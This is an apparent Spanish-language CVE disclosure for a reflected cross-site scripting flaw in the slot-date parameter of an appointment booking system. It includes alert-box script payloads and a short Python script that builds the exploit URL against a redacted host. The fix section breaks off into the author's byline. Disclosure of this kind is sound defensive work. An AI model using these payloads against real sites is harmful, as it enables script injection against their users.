
CVE-ID: CVE-2025-46181
Descubierto por: Shemkumar P (shemkumar.github.io)
Tipo de vulnerabilidad: Cross-Site Scripting (XSS) reflejado
Severidad: Media
Estado: Divulgado, CVE asignado por MITRE
Existe una vulnerabilidad de Cross-Site Scripting (XSS) reflejado en un sistema público de reserva de citas en línea (v1.0), específicamente en la página que gestiona la confirmación de citas. Un parámetro GET no sanea correctamente la entrada, lo que permite la inyección de JavaScript y la ejecución de código en el navegador de la víctima.
GET /confirmapp.php?slotdt=<payload>
Carga útil de ejemplo (codificada):
<script>alert("XSS")</script>
<script>alert("You have been hijacked")</script>
🚫 Enlace en vivo omitido por razones éticas. Esta vulnerabilidad fue probada en un entorno controlado.
import requests
from urllib.parse import quote
base_url = "https://[REDACTED]/confirmapp.php"
payload = '<script>alert("XSS triggered")</script>'
params = {
'fullname': 'test',
'mobile': '9999999999',
'emailid': '[email protected]',
'slotdt': payload,
'slottime': '11:00:00',
'doctorid': '2'
}
encoded = '&'.join(f"{k}={quote(str(v))}" for k, v in params.items())
print("Test URL (use only in authorized test environments):")
print(f"{base_url}?{encoded}")
La aplicación debería:
htmlspecialchars() en PHPShemkumar P
🕸️ shemkumar.github.io
🔐 Investigador de ciberseguridad | Entusiasta de CTF | Reportero de CVE
⚠️ Esta publicación es solo para uso educativo y defensivo. Probar o explotar vulnerabilidades en sistemas que no posees o para los que no tienes permiso explícito es ilegal y poco ético.